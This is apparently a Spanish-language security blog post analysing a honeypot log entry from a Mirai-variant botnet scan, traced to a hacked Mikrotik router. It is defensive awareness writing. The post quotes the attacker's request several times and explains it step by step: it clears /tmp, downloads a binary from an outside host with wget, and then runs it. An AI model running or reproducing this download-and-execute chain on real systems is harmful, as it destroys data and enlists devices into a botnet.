Insights > Blog

 

 

Cuál será la próxima ola de ataques?

 

Como profesional de seguridad cibernética, tengo mi propio laboratorio con algunos equipos virtuales adquiridos en todo el mundo. El objetivo es simplemente investigar y realizar pruebas para identificar nuevos ataques, soluciones y posibilidades.
Cuando el equipo no se está utilizando, continúa funcionando como «honeypots» (una computadora dejada a propósito para ser atacada), recolectando registros, es decir, intentos de acceso también conocidos como LOG. Nuevamente, el objetivo es la investigación y el análisis futuros.

Este fin de semana, encontré un hecho muy curioso. Al analizar los logotipos de un servidor web, identifiqué la siguiente línea: las direcciones IP se anonimizaron a propósito:

77.xxx.xxx.xxxx – – [27/Jun/2020:22:42:32 +0000] «GET /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1» 404 488 «-» «Hello, world»

Esta línea tiene la composición probable:

  • ¿Quién?
    •   Dirección IP de la persona que realiza la conexión:
      • 77.xxx.xxx.xxxx
  • ¿Cuando?
    • Fecha y hora:
      • 27/Jun/2020:22:42:32 +0000
  • ¿Qué?
    • ¿Qué estabas buscando o accediendo?
      • /shell?cd+/tmp;rm+-rf+*;wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws
  • Respuesta
    • Código de respuesta (correcto o incorrecto)
      • 404 == No encontrado
  • Navegador
    • ¿Qué navegador estaba usando para este acceso?
      • Hello, world

¿El qué?» y «Navegador» se destacan en esta línea. Esto se debe a que es inusual encontrar acceso legítimo a las líneas LOG que contienen comandos de Linux. Además, el último campo debe ser la identificación del navegador (Mozilla, Chrome, etc.) pero aparece el texto «Hello world».

Comprender la función del comando «¿Qué?» si el ataque se hubiera llevado a cabo.
cd+/tmp Ir al directorio temporal
rm+-rf+* Borrar todo el contenido de esta ubicación
wget+185.yyy.yyy.yyy/bins/UnHAnaAW.x86 Vaya a 185.yyy.yyy.yyy y descargue los archivos: UnHAnaAW.x86
chmod+777+/tmp/UnHAnaAW.x86 Cambiar los permisos del archivo UnHAnaAW.x86
sh+/tmp/UnHAnaAW.x86+w00dy.jaws Ejecute el archivo UnHAnaAW.x86 pasando el texto «w00dy.jaws» como parámetro

Figura 1

La descripción «Qué» anterior muestra que el atacante podría ejecutar comandos en las máquinas de las víctimas. Esto significa que podría tener acceso completo al equipo y controlarlo como lo desee.

Analizando la ubicación donde debería haberse realizado la descarga, encontramos un repositorio con archivos binarios para diferentes plataformas o equipos), como se muestra en la siguiente figura:

Figura 2

La afirmación de que esta es una acción maliciosa también proviene de consultar el archivo UnHAnaAW.x86 en el sitio web de Virustotal (www.virustotal.com), que muestra la identificación del archivo como malicioso por 40 programas diferentes de AntiMalware.
Muchos de estos AntiMalwares han categorizado este archivo, como una variación de MIRAI, un malware o botnet que ha estado causando impactos desde 2016. En este caso, después de verificar las figuras 2 y 3, identificamos que el archivo se creó el 9 de junio de 2020. Este mismo archivo se envió a VirusTotal al día siguiente, es decir, el 10 de junio de 2020.
Concluimos, por lo tanto, que este archivo es nuevo y diferente de la versión 2016, y puede contener características más dañinas, pero es parte de la misma familia vista desde 2016.

Figura 3

Al buscar la dirección IP que hizo el acceso, se encontró un enrutador Mikrotik.

Figura 4

Entonces, ¿qué significa todo esto?

  • El enrutador Mikrotik está pirateado y busca nuevas víctimas para la botnet;
  • Es difícil y quizás imposible instalar un software antivirus en algunos tipos de equipos;
  • Hay varias máquinas infectadas en todo el mundo;
  • No sabemos:
    • Cómo se usarán estas máquinas;
    • ¿Quiénes serán las víctimas?
    • Cuándo ocurrirá el próximo ataque masivo.
Conclusión

En este momento, los dispositivos en su casa pueden ser parte de una red de computadoras que fueron pirateadas previamente y que intentan piratear otros dispositivos.
Esto puede tener un impacto inimaginable y causar pérdidas intangibles a empresas e individuos.
Por lo tanto, vale la pena mencionar la necesidad de actualizar los dispositivos domésticos en general.
Esta investigación fue superficial. Por lo tanto, no se sabe cuántas máquinas existen en esta BotNet. De todos modos, una máquina maliciosa siempre es un gran riesgo.
Durante más de un año, diferentes versiones de este software han estado buscando en Internet nuevas víctimas, y no tenemos forma de predecir cuándo ocurrirá un nuevo ataque masivo.

Si es un usuario habitual de tecnología, actualice todos sus dispositivos. Ayúdanos en esta batalla contra ataques e invasiones de seguridad cibernética.
En el caso de los profesionales de ciberseguridad, revise sus registros para detectar anomalías y mantenga actualizados todos los sistemas y dispositivos, así como su política de seguridad.

Referencias

Análisis detallado de versiones muy similares de este malware, incluidas las indicaciones de compromiso.

  • https://blog.race-conditions.net/posts/solar-and-solstice-two-mirai-variants/
  • https://otx.alienvault.com/indicator/file/d15b5dc561a5a1606aeba6baf8be670027a890e7
  • https://www.virustotal.com/gui/file/e9bd99ec7054bc2e1c343bd02633920ae4ebf745ca69bbe2271bd6dfaa4a89b9/details

Este artículo fue escrito con el objetivo de alertar sobre posibles ataques masivos. En poco tiempo, nuestro objetivo es enseñarle cómo suavizar los registros.

Autor: Fernando Amatte, director de Red Team Services en Cipher Latino America

0 comentarios

Enviar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

RECIBE NUESTRAS NOTÍCIAS!

Information Security Maturity Self-Assessment Survey

Más información

•  Whitepapers
•  E-books
•  Checklists
•  Self-Assessments
•  Webcasts
•  Infographics